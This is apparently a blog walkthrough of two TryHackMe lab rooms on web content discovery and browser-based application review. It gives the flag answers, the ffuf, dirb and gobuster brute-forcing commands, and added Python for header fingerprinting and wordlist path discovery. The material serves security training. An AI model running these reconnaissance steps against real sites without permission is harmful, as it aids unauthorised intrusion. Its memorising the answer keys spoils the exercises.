    There are three main ways of discovering content on a website which we'll cover. Manually, Automated and OSINT (Open-Source Intelligence).

    Start the machine and then move on to the next task.






    1) What is the Content Discovery method that begins with M?

    Ans- Manually



    2) What is the Content Discovery method that begins with A?

    Ans- Automated



    3) What is the Content Discovery method that begins with O?

    Ans- OSINT






    Manual Discovery - Robots.txt


    There are multiple places we can manually check on a website to start discovering more content.



    Robots.txt

    The robots.txt file is a document that tells search engines which pages they are and aren't allowed to show on their search engine results or ban specific search engines from crawling the website altogether. It can be common practice to restrict certain website areas so they aren't displayed in search engine results. These pages may be areas such as administration portals or files meant for the website's customers. This file gives us a great list of locations on the website that the owners don't want us to discover as penetration testers.


    Take a look at the robots.txt file on the Acme IT Support website to see if they have anything they don't want to list: http://MACHINE_IP/robots.txt



    1) What is the directory in the robots.txt that isn't allowed to be viewed by web crawlers?

    Ans- /staff-portal

     

     


    Manual Discovery - Favicon


    Favicon

    The favicon is a small icon displayed in the browser's address bar or tab used for branding a website.




    Sometimes when frameworks are used to build a website, a favicon that is part of the installation gets left over, and if the website developer doesn't replace it with a custom one, this can give us a clue as to what framework is in use. OWASP hosts a database of common framework icons that you can use to check against the target's favicon: https://wiki.owasp.org/index.php/OWASP_favicon_database. Once we know the framework stack, we can use external resources to discover more about it (see next section).



    Practical Exercise:


    Open the website https://static-labs.tryhackme.cloud/sites/favicon/. Here you'll see a basic website with a note saying "Website coming soon..."; if you look at your tabs you'll notice an icon, which confirms this site is using a favicon.


    Viewing the page source you'll see line six contains a link to the images/favicon.ico file. 







    Downloading the favicon and computing its MD5 hash gives a value that you can then look up in the OWASP favicon database:
    https://wiki.owasp.org/index.php/OWASP_favicon_database.


     

     
    1) What framework did the favicon belong to?

    HINT- Visit this link https://wiki.owasp.org/index.php/OWASP_favicon_database






    Ans- cgiirc

     

     

    Manual Discovery - Sitemap.xml


    Sitemap.xml

    Unlike the robots.txt file, which restricts what search engine crawlers can look at, the sitemap.xml file gives a list of every file the website owner wishes to be listed on a search engine. These can sometimes contain areas of the website that are a bit more difficult to navigate to or even list some old webpages that the current site no longer uses but are still working behind the scenes.


    Take a look at the sitemap.xml file on the Acme IT Support website to see if there's any new content we haven't yet discovered: http://10.10.159.199/sitemap.xml



    1) What is the path of the secret area that can be found in the sitemap.xml file?


    Ans- /s3cr3t-area


     

     

    Manual Discovery - HTTP Headers


    HTTP Headers

    When we make requests to the web server, the server returns various HTTP headers. These headers can sometimes contain useful information such as the webserver software and possibly the programming/scripting language in use. In the below example, we can see the webserver is NGINX version 1.18.0 and runs PHP version 7.4.3. Using this information, we could find vulnerable versions of software being used. Try running the below curl command against the web server, where the -v switch enables verbose mode, which will output the headers (there might be something interesting!).

     

               
    
     
    
            
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~]
    └─$ curl http://10.10.159.199 -v
    *   Trying 10.10.159.199:80...
    * Connected to 10.10.159.199 (10.10.159.199) port 80 (#0)
    >  GET / HTTP/1.1
    >  Host: 10.10.159.199
    >  User-Agent: curl/7.74.0
    >  Accept: */*
    > * Mark bundle as not supporting multiuse
    < HTTP/1.1 200 OK
    < Server: nginx/1.18.0 (Ubuntu)
    < Date: Thu, 02 Dec 2021 16:44:21 GMT
    < Content-Type: text/html; charset=UTF-8
    < Transfer-Encoding: chunked
    < Connection: keep-alive
    < X-FLAG: THM{HEADER_FLAG}
    < 
    <!--
    This page is temporary while we work on the new homepage @ /new-home-beta
    -->
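    Parsing the same response programmatically, as an added example (not code from the room or the original post). The raw response below is constructed from the curl transcript above; the X-Powered-By line is added to reflect the PHP version the text says the headers reveal. The functions separate the headers that disclose software versions (the ones a hardening review would remove) from app-specific X- headers, and pull HTML comments out of the body.

```python
"""Pull fingerprinting headers and body comments out of a raw HTTP response."""
import re
from typing import Dict, List, Tuple

# Constructed raw response modelled on the curl -v output above (X-Powered-By added
# to mirror the PHP version mentioned in the text). Parsed offline, no target needed.
SAMPLE_RESPONSE = (
    b"HTTP/1.1 200 OK\r\n"
    b"Server: nginx/1.18.0 (Ubuntu)\r\n"
    b"Date: Thu, 02 Dec 2021 16:44:21 GMT\r\n"
    b"Content-Type: text/html; charset=UTF-8\r\n"
    b"X-Powered-By: PHP/7.4.3\r\n"
    b"X-FLAG: THM{HEADER_FLAG}\r\n"
    b"\r\n"
    b"<!--\nThis page is temporary while we work on the new homepage @ /new-home-beta\n-->\n"
)

# Headers that commonly disclose the software stack and its version.
FINGERPRINT_HEADERS = ("server", "x-powered-by", "x-aspnet-version", "x-generator", "via")


def parse_response(raw: bytes) -> Tuple[int, Dict[str, str], bytes]:
    """Split a raw HTTP/1.x response into status code, lower-cased headers and body."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("iso-8859-1").split("\r\n")
    status = int(lines[0].split(" ", 1)[1][:3])
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return status, headers, body


def version_disclosures(headers: Dict[str, str]) -> Dict[str, str]:
    """Headers that reveal product names or versions."""
    return {h: headers[h] for h in FINGERPRINT_HEADERS if h in headers}


def custom_headers(headers: Dict[str, str]) -> Dict[str, str]:
    """Non-standard X- headers that are not version banners; often application-specific."""
    return {h: v for h, v in headers.items()
            if h.startswith("x-") and h not in FINGERPRINT_HEADERS}


def html_comments(body: bytes) -> List[str]:
    """HTML comments in the body, which can leak paths such as the /new-home-beta note above."""
    return [c.decode("utf-8", "replace").strip()
            for c in re.findall(rb"<!--(.*?)-->", body, re.S)]
```

    On the defending side, the version_disclosures() output is the list to suppress (server_tokens off in NGINX, expose_php = Off in PHP), since a precise version string is what lets an attacker match the server against published vulnerabilities.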
    
    

     


    1) What is the flag value from the X-FLAG header?

      
    Ans- THM{HEADER_FLAG}

     

     



    Manual Discovery - Framework Stack

    Framework Stack

    Once you've established the framework of a website, either from the above favicon example or by looking for clues in the page source such as comments, copyright notices or credits, you can then locate the framework's website. From there, we can learn more about the software and other information, possibly leading to more content we can discover.


    Looking at the page source of our Acme IT Support website (http://10.10.159.199), you'll see a comment at the end of every page with a page load time and also a link to the framework's website, which is https://static-labs.tryhackme.cloud/sites/thm-web-framework. Let's take a look at that website. Viewing the documentation page gives us the path of the framework's administration portal, which gives us a flag if viewed on the Acme IT Support website.



    1) What is the flag from the framework's administration portal?

     


     

    Ans- THM{CHANGE_DEFAULT_CREDENTIALS}

     

     

    OSINT - Google Hacking / Dorking


    There are also external resources available that can help in discovering information about your target website; these resources are often referred to as OSINT (Open-Source Intelligence), as they are freely available tools and sources that collect information:



    Google Hacking / Dorking


    Google hacking / dorking utilizes Google's advanced search engine features, which allow you to pick out custom content. For instance, you can restrict results to a certain domain name using the site: filter (site:hackingtruth.in) and then combine it with a search term, say the word admin (site:hackingtruth.in admin); this would only return results from the hackingtruth.in website that contain the word admin in their content. You can combine multiple filters as well. Here are some more filters you can use:

     

     

    Filter     Example              Description
    site       site:tryhackme.com   returns results only from the specified website address
    inurl      inurl:admin          returns results that have the specified word in the URL
    filetype   filetype:pdf         returns results which are a particular file extension
    intitle    intitle:admin        returns results that contain the specified word in the title

     



    More information about Google hacking can be found here: https://en.wikipedia.org/wiki/Google_hacking



    1) What Google dork operator can be used to only show results from a particular site?

    Ans- site:



    OSINT - Wappalyzer


    Wappalyzer

    Wappalyzer (https://www.wappalyzer.com/) is an online tool and browser extension that helps identify what technologies a website uses, such as frameworks, Content Management Systems (CMS), payment processors and much more, and it can even find version numbers as well.



    1) What online tool can be used to identify what technologies a website is running?

    Ans- Wappalyzer




    OSINT - Wayback Machine


    Wayback Machine

    The Wayback Machine (https://archive.org/web/) is a historical archive of websites that dates back to the late 90s. You can search a domain name, and it will show you all the times the service scraped the web page and saved the contents. This service can help uncover old pages that may still be active on the current website.



    1) What is the website address for the Wayback Machine?

    Ans- https://archive.org/web/



    OSINT - GitHub


    GitHub

    To understand GitHub, you first need to understand Git. Git is a version control system that tracks changes to files in a project. Working in a team is easier because you can see what each team member is editing and what changes they made to files. When users have finished making their changes, they commit them with a message and then push them back to a central location (repository) for the other users to then pull those changes to their local machines. GitHub is a hosted version of Git on the internet. Repositories can either be set to public or private and have various access controls. You can use GitHub's search feature to look for company names or website names to try and locate repositories belonging to your target. Once discovered, you may have access to source code, passwords or other content that you hadn't yet found.



    1) What is Git?

    Ans- Version Control System



    OSINT - S3 Buckets


    S3 Buckets

    S3 Buckets are a storage service provided by Amazon AWS, allowing people to save files and even static website content in the cloud accessible over HTTP and HTTPS. The owner of the files can set access permissions to either make files public, private and even writable. Sometimes these access permissions are incorrectly set and inadvertently allow access to files that shouldn't be available to the public. The format of the S3 buckets is http(s)://{name}.s3.amazonaws.com where {name} is decided by the owner, such as tryhackme-assets.s3.amazonaws.com. S3 buckets can be discovered in many ways, such as finding the URLs in the website's page source, GitHub repositories, or even automating the process. One common automation method is by using the company name followed by common terms such as {name}-assets, {name}-www, {name}-public, {name}-private, etc.



    1) What URL format do Amazon S3 buckets end in?

    Ans- .s3.amazonaws.com




    Automated Discovery


    What is Automated Discovery?


    Automated discovery is the process of using tools to discover content rather than doing it manually. This process is automated as it usually contains hundreds, thousands or even millions of requests to a web server. These requests check whether a file or directory exists on a website, giving us access to resources we didn't previously know existed. This process is made possible by using a resource called wordlists.





    What are wordlists?


    Wordlists are just text files that contain a long list of commonly used words; they can cover many different use cases. For example, a password wordlist would include the most frequently used passwords, whereas we're looking for content in our case, so we'd require a list containing the most commonly used directory and file names. An excellent resource for wordlists that is preinstalled on the THM AttackBox is https://github.com/danielmiessler/SecLists which Daniel Miessler curates.




    Automation Tools


    Although there are many different content discovery tools available, all with their features and flaws, we're going to cover three which are preinstalled on our attack box, ffuf, dirb and gobuster.


    Open the THM AttackBox using the blue Start AttackBox button and then try the below three commands on our Acme IT Support website and see what results you get.

     

    Using ffuf:

    user@machine$ ffuf -w /usr/share/wordlists/SecLists/Discovery/Web-Content/common.txt -u http://10.10.159.199/FUZZ

    Using dirb:

    user@machine$ dirb http://10.10.159.199/ /usr/share/wordlists/SecLists/Discovery/Web-Content/common.txt

    Using Gobuster:

    user@machine$ gobuster dir --url http://10.10.159.199/ -w /usr/share/wordlists/SecLists/Discovery/Web-Content/common.txt
    
    
    
    

     


    1) What is the name of the directory beginning "/mo...." that was discovered?

    Ans- /monthly



    2) What is the name of the log file that was discovered?

    Ans- /development.log
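    What ffuf, dirb and gobuster do under the hood, reduced to a few lines of Python as an added example (not code from those tools, the room, or the original post). The loop requests base URL plus each wordlist entry and keeps anything that does not answer 404, which is ffuf's default filter. The target here is a constructed in-memory stand-in (FAKE_SITE and fake_fetch) so the example runs offline; http_fetch() is the real equivalent and needs network access.

```python
"""A minimal content-discovery loop: wordlist in, non-404 hits out."""
import urllib.error
import urllib.request
from typing import Callable, Iterable, List, Tuple

# Constructed stand-in for a target: path -> status code a real server might return.
FAKE_SITE = {"/": 200, "/news": 200, "/contact": 200, "/monthly": 301,
             "/assets": 403, "/development.log": 200}


def fake_fetch(url: str) -> int:
    """Status code for a URL on the constructed site; unknown paths answer 404."""
    path = url[url.index("/", len("http://")):]
    return FAKE_SITE.get(path, 404)


def http_fetch(url: str, timeout: float = 5.0) -> int:
    """Real request returning only the status code (network access assumed)."""
    req = urllib.request.Request(url, headers={"User-Agent": "content-discovery-example/1.0"})
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.status
    except urllib.error.HTTPError as err:
        return err.code


def discover(base_url: str, wordlist: Iterable[str],
             fetch: Callable[[str], int] = http_fetch,
             hide_status: Tuple[int, ...] = (404,)) -> List[Tuple[str, int]]:
    """Request base_url/<word> for each word and keep the hits.

    The status filter is the important knob: a site that answers 200 for every path
    (soft 404s) turns every word into a hit, which is why the real tools can also
    filter on response size or word count.
    """
    base = base_url.rstrip("/")
    hits: List[Tuple[str, int]] = []
    for word in wordlist:
        word = word.strip()
        if not word or word.startswith("#"):   # skip blanks and wordlist comments
            continue
        path = "/" + word.lstrip("/")
        status = fetch(base + path)
        if status not in hide_status:
            hits.append((path, status))
    return hits


if __name__ == "__main__":
    # Constructed mini wordlist standing in for common.txt.
    for path, status in discover("http://10.10.159.199",
                                 ["admin", "monthly", "news", "development.log", "backup"],
                                 fetch=fake_fetch):
        print(status, path)
```

    A 301 or 403 is still a hit: both confirm that the path exists even though it does not serve content directly. From the server's side this activity is easy to spot: a burst of hundreds of 404 responses from one client in the access log is the signature of a wordlist being run against the site.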

     

     


    Disclaimer

     

    All tutorials are for informational and educational purposes only and have been made using our own routers, servers, websites and other vulnerable free resources. They do not contain any illegal activity. We believe that ethical hacking, information security and cyber security should be familiar subjects to anyone using digital information and computers. Hacking Truth is against misuse of the information and we strongly suggest against it. Please regard the word hacking as ethical hacking or penetration testing every time this word is used. We do not promote, encourage, support or excite any illegal activity or hacking.



      - Hacking Truth by Kumar Atul Jaiswal

     


  • TryHackMe Walking An Application Walkthrough

     

    TryHackMe Walking An Application Walkthrough



    Walking An Application


    In this room you will learn how to manually review a web application for security issues using only the in-built tools in your browser. More often than not, automated security tools and scripts will miss many potential vulnerabilities and useful information.



    Here is a short breakdown of the in-built browser tools you will use throughout this room:


    View Source - Use your browser to view the human-readable source code of a website.
    Inspector - Learn how to inspect page elements and make changes to view usually blocked content.
    Debugger - Inspect and control the flow of a page's JavaScript.
    Network - See all the network requests a page makes.

     

     


     



    Exploring The Website


    As a penetration tester, your role when reviewing a website or web application is to discover features that could potentially be vulnerable and attempt to exploit them to assess whether or not they are. These features are usually parts of the website that require some interactivity with the user.

    Finding interactive portions of the website can be as easy as spotting a login form to manually reviewing the website's JavaScript. An excellent place to start is just with your browser exploring the website and noting down the individual pages/areas/features with a summary for each one.


    An example site review for the Acme IT Support website would look something like this:

     

     

    Feature                  URL                     Summary
    Home Page                /                       This page contains a summary of what Acme IT Support does with a company photo of their staff.
    Latest News              /news                   This page contains a list of recently published news articles by the company, and each news article has a link with an id number, i.e. /news/article?id=1
    News Article             /news/article?id=1      Displays the individual news article. Some articles seem to be blocked and reserved for premium customers only.
    Contact Page             /contact                This page contains a form for customers to contact the company. It contains name, email and message input fields and a send button.
    Customers Login          /customers/login        This page contains a login form with username and password fields.
    Customer Signup          /customers/signup       This page contains a user-signup form that consists of username, email, password and password confirmation input fields.
    Customer Reset Password  /customers/reset        Password reset form with an email address input field.
    Customer Dashboard       /customers              This page contains a list of the user's tickets submitted to the IT support company and a "Create Ticket" button.
    Create Ticket            /customers/ticket/new   This page contains a form with a textbox for entering the IT issue and a file upload option to create an IT support ticket.
    Customer Account         /customers/account      This page allows the user to edit their username, email and password.
    Customer Logout          /customers/logout       This link logs the user out of the customer area.

     

     


    Viewing The Page Source



    The page source is the human-readable code returned to our browser/client from the web server each time we make a request.


    The returned code is made up of HTML (HyperText Markup Language), CSS (Cascading Style Sheets) and JavaScript, and it's what tells our browser what content to display, how to show it and adds an element of interactivity with JavaScript.


    For our purposes, viewing the page source can help us discover more information about the web application.


    How do I view the Page Source?


    While viewing a website, you can right-click on the page, and you'll see an option on the menu that says View Page Source.
    Most browsers support putting view-source: in front of the URL, for example view-source:https://www.google.com/
    In your browser menu, you'll find an option to view the page source. This option can sometimes be in submenus such as developer tools or more tools.



    Let's view some Page Source!


    Try viewing the page source of the home page of the Acme IT Support website. Unfortunately, explaining everything you can see here is well out of the scope of this room, and you'll need to look into website design/development courses to understand it fully. What we can do, is pick out bits of information that are of importance to us.

     

     

    At the top of the page, you'll notice some code starting with <!-- and ending with --> these are comments. Comments are messages left by the website developer, usually to explain something in the code to other programmers or even notes/reminders for themselves. These comments don't get displayed on the actual webpage. This comment describes how the homepage is temporary while a new one is in development. View the webpage in the comment to get your first flag.


    Links to different pages in HTML are written in anchor tags ( these are HTML elements that start with <a ), and the link that you'll be directed to is stored in the href attribute.


    For example, you'll see the contact page link on line 31 of the page source.


     

     If you view further down the page source, there is a hidden link to a page starting with "secr", view this link to get another flag. You obviously wouldn't get a flag in a real-world situation, but you may discover some private area used by the business for storing company/staff/customer information.


    External files such as CSS, JavaScript and Images can be included using the HTML code. In this example, you'll notice that these files are all stored in the same directory. If you view this directory in your web browser, there is a configuration error. What should be displayed is either a blank page or a 403 Forbidden page with an error stating you don't have access to the directory. Instead, the directory listing feature has been enabled, which in fact, lists every file in the directory. Sometimes this isn't an issue, and all the files in the directory are safe to be viewed by the public, but in some instances, backup files, source code or other confidential information could be stored here. In this instance, we get a flag in the flag.txt file.


    Many websites these days aren't made from scratch and use what's called a framework. A framework is a collection of premade code that easily allows a developer to include common features that a website would require, such as blogs, user management, form processing, and much more, saving the developers hours or days of development.


    Viewing the page source can often give us clues into whether a framework is in use and, if so, which framework and even what version. Knowing the framework and version can be a powerful find as there may be public vulnerabilities in the framework, and the website might not be using the most up to date version. At the bottom of the page, you'll find a comment about the framework and version in use and a link to the framework's website. Viewing the framework's website, you'll see that our website is, in fact, out of date. Read the update notice and use the information that you find to discover another flag.
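    The checks above (comments, anchor tags and their href values, the directory that serves external files, the framework note at the bottom) automated with Python's html.parser, as an added example that is not code from the room or the original post. The page source below is constructed for the example: the /assets directory, the /secret-page link and the framework comment are illustrative stand-ins for what the room's page contains, and the version string in the comment is made up.

```python
"""Triage a page's HTML source: comments, links, asset directories, directory listings."""
from html.parser import HTMLParser
from posixpath import dirname
from typing import Dict, List

# Constructed page source modelled on the Acme IT Support home page described above.
SAMPLE_SOURCE = """<!DOCTYPE html>
<!--
This page is temporary while we work on the new homepage @ /new-home-beta
-->
<html><head>
<link rel="stylesheet" href="/assets/style.css">
<script src="/assets/jquery.min.js"></script>
</head><body>
<a href="/">Home</a> <a href="/news">News</a> <a href="/contact">Contact</a>
<a href="/secret-page" style="display:none">Hidden</a>
<img src="/assets/logo.png">
</body>
<!-- page load time 0.03s; framework: example-framework v0.0 (constructed); https://static-labs.tryhackme.cloud/sites/thm-web-framework -->
</html>
"""


class SourceTriage(HTMLParser):
    """Collects the items a reviewer looks for first in page source."""

    def __init__(self) -> None:
        super().__init__()
        self.comments: List[str] = []
        self.links: List[str] = []
        self.assets: List[str] = []

    def handle_comment(self, data: str) -> None:
        # Collapse whitespace so multi-line comments read as one line.
        self.comments.append(" ".join(data.split()))

    def handle_starttag(self, tag, attrs) -> None:
        a = dict(attrs)
        if tag == "a" and a.get("href"):
            self.links.append(a["href"])
        elif tag in ("script", "img") and a.get("src"):
            self.assets.append(a["src"])
        elif tag == "link" and a.get("href"):
            self.assets.append(a["href"])


def triage(source: str) -> Dict[str, List[str]]:
    """Return comments, anchor targets and the distinct directories that serve assets."""
    p = SourceTriage()
    p.feed(source)
    p.close()
    asset_dirs = sorted({dirname(path) for path in p.assets})
    return {"comments": p.comments, "links": p.links, "asset_dirs": asset_dirs}


def looks_like_directory_listing(html: str) -> bool:
    """Heuristic for the autoindex page Apache/NGINX return when listing is enabled."""
    lowered = html.lower()
    return "<title>index of /" in lowered or "parent directory" in lowered


if __name__ == "__main__":
    for key, values in triage(SAMPLE_SOURCE).items():
        print(key)
        for v in values:
            print("   ", v)
```

    The asset_dirs output is the list of directories to request by hand; if the response passes looks_like_directory_listing(), the server has autoindex enabled and every file in that directory is exposed, which is the misconfiguration the flag.txt step above demonstrates. The fix is Options -Indexes (Apache) or autoindex off (NGINX) for that location.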


     


    1) What is the flag from the HTML comment?

    HINT- Make sure you go to the link mentioned in the comment

     





    Ans- THM{HTML_COMMENTS_ARE_DANGEROUS}

     

    2) What is the flag from the secret link?

    HINT- The contact page link is on line 31 of the page source; the hidden "secr" link is further down the same source.







    Ans- THM{NOT_A_SECRET_ANYMORE}
     



    3) What is the directory listing flag?




     


    Ans- THM{INVALID_DIRECTORY_PERMISSIONS}

     


    4) What is the framework flag?



     

    Ans- THM{KEEP_YOUR_SOFTWARE_UPDATED}

     

     

    Developer Tools - Inspector


    Developer Tools

    Every modern browser includes developer tools; this is a tool kit used to aid web developers in debugging web applications and gives you a peek under the hood of a website to see what is going on. As a pentester, we can leverage these tools to provide us with a much better understanding of the web application. We're specifically focusing on three features of the developer tool kit, Inspector, Debugger and Network.



    Opening Developer Tools


    The way to access developer tools is different for every browser. If you're not sure how to access it, click the "View Site" button on the top right of this task to get instructions on how to access the tools for your browser.




    Inspector


    The page source doesn't always represent what's shown on a webpage; this is because CSS, JavaScript and user interaction can change the content and style of the page, which means we need a way to view what's been displayed in the browser window at this exact time. Element inspector assists us with this by providing us with a live representation of what is currently on the website.


    As well as viewing this live view, we can also edit and interact with the page elements, which is helpful for web developers to debug issues.

    On the Acme IT Support website, click into the news section, where you'll see three news articles.


    The first two articles are readable, but the third has been blocked with a floating notice above the content stating you have to be a premium customer to view the article. These floating boxes blocking the page contents are often referred to as paywalls as they put up a metaphorical wall in front of the content you wish to see until you pay.



     


     

    Right-clicking on the premium notice (paywall), you should be able to select the Inspect option from the menu, which opens the developer tools either on the bottom or right-hand side depending on your browser or preferences. You'll now see the elements/HTML that make up the website (similar to the screenshots in the room).

     


     

    Locate the DIV element with the class premium-customer-blocker and click on it. You'll see all the CSS styles in the styles box that apply to this element, such as margin-top: 60px and text-align: center. The style we're interested in is the display: block. If you click on the word block, you can type a value of your own choice. Try typing none, and this will make the box disappear, revealing the content underneath it and a flag. If the element didn't have a display field, you could click below the last style and add in your own. Have a play with the element inspector, and you'll see you can change any of the information on the website, including the content. Remember this is only edited on your browser window, and when you press refresh, everything will be back to normal.

     




    1) What is the flag behind the paywall?

    HINT- https://assets.tryhackme.com/additional/walkinganapplication/updating-html-css.gif



     

     

    Ans- THM{NOT_SO_HIDDEN}

     

     


    Developer Tools - Debugger


    This panel in the developer tools is intended for debugging JavaScript, and again is an excellent feature for web developers wanting to work out why something might not be working. But as penetration testers, it gives us the option of digging deep into the JavaScript code. In Firefox and Safari, this feature is called Debugger, but in Google Chrome, it's called Sources.


    On the Acme IT Support website, click on the contact page, each time the page is loaded, you might notice a rapid flash of red on the screen. We're going to use the Debugger to work out what this red flash is and if it contains anything interesting. Debugging a red dot wouldn't be something you'd do in the real world as a penetration tester, but it does allow us to use this feature and get used to the Debugger.


    In both browsers, on the left-hand side, you see a list of all the resources the current webpage is using. If you click into the assets folder, you'll see a file named flash.min.js. Clicking on this file displays the contents of the JavaScript file.


    Many times when viewing JavaScript files, you'll notice that everything is on one line, which is because it has been minified, meaning all formatting (tabs, spacing and newlines) has been removed to make the file smaller. This file is no exception, and it has also been obfuscated, which makes it purposely difficult to read so it can't be copied as easily by other developers.


    We can restore some of the formatting by using the "Pretty Print" option, which looks like two braces { }, to make it a little more readable, although due to the obfuscation it's still difficult to comprehend what is going on in the file. If you scroll to the bottom of the flash.min.js file, you'll see the line:

    flash['remove'](); 

     

    This little bit of JavaScript is what is removing the red popup from the page. We can utilise another feature of debugger called breakpoints. These are points in the code that we can force the browser to stop processing the JavaScript and pause the current execution.


    If you click the line number that contains the above code, you'll notice it turns blue; you've now inserted a breakpoint on this line. Now try refreshing the page, and you'll notice the red box stays on the page instead of disappearing, and it contains a flag.



    1) What is the flag in the red box?

    HINT- The debugger tools might work differently on FireFox/Chrome. Follow the steps in the task to find the JavaScript flash.min.js file, prettifying it, finding the line with "flash[remove]" and adding a JavaScript break point to stop the red message disappearing when the page loads.





    Ans- THM{CATCH_ME_IF_YOU_CAN}

     

     


    Developer Tools - Network


    The network tab on the developer tools can be used to keep track of every external request a webpage makes. If you click on the Network tab and then refresh the page, you'll see all the files the page is requesting.


    Try doing this on the contact page; you can press the trash can icon to delete the list if it gets a bit overpopulated.


    With the network tab open, try filling in the contact form and pressing the Send Message button. You'll notice an event in the network tab: this is the form being submitted in the background using a method called AJAX. AJAX is a method for sending and receiving network data in the background of a web application without reloading or changing the current web page.







    Examine the new entry on the network tab that the contact form created and view the page the data was sent to in order to reveal a flag.

     

    1) What is the flag shown on the contact-msg network request?

    HINT- When you find the contact-msg request, make sure you click on it to reveal the response of the request (there might be a Response tab shown when you click it). After filling in the form, click the refresh button, find the contact-msg entry and double-click it.


     


     



    Ans- THM{GOT_AJAX_FLAG}
     

     

     





     
